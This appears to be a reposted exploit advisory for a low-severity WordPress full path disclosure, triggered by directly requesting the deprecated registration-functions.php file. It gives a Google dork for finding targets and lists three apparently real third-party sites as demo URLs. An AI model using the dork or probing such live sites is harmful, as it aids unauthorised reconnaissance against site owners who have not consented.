================================================================================
____ _ _ ____ _ _ ____ _ _ ___ ____ ____
|__| | | |__| |__| |__| |_/ |__] |__| |__/ I Love Palestine
| | |___ |___ | | | | | | | \_ |__] | | | \
================================================================================
####
# Exploit Title: WordPress all Version full Path Disclosure Vulnerability
# Author: KinG Of PiraTeS
# GooGle+ : http://goo.gl/5RVFv
# Facebook Profile: www.fb.me/cr4ck3d
# Facebeook Page : www.fb.me/serial.crack
# Facebeook Page : www.fb.me/Cars2Luxe
# E-mail: t5r@hotmail.com / cr4ck3d@offdr5cax.dz
# Web Site : www.1337day.com | www.inj3ct0rs.com
# Category:: webapps
# Google Dork: intext:"powered by WordPress"
# platform : php
# Vendor: http://www.wordpress.com/
# Version: all
# Security Risk : Low ( Only for inforamtion )
# Tested on: [Windows 7 Edition Intégrale 64bit ]
####
==============
1)Exploit
=========
[~] P0c [~] :
============
Vuln file in :
http://Localhost/{Path}/wp-includes/registration-functions.php
[~] Vuln Code [~] :
---->
<?php
/**
* Deprecated. No longer needed.
*
* @package WordPress
*/
_deprecated_file( basename(__FILE__), '2.1', null, __( 'This file no longer needs to be included.' ) );
?>
----->
There is no file to Call from the Function shown below
[~] D3m0 [~] :
=============
http://hotelsandhighways.com/blog/wp-includes/registration-functions.php?nulled=1337day
http://beavory.com/wp-includes/registration-functions.php?nulled=1337day
http://www.chateau-theme.com/wp-includes/registration-functions.php?nulled=1337day
Source: http://1337day.com/exploits/18958
If you like my blog, Please Donate Me
No comments:
Post a Comment